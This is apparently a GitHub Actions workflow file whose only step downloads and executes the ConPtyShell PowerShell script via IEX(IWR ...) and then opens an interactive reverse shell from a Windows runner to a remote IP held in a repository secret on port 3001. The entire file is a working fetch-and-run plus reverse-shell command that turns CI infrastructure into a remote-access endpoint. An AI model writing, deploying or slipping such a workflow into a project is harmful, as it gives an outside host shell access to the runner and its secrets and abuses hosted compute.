name: Console

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: windows-latest

    steps:
      - run: IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell ${{ secrets.RemoteIp }} 3001
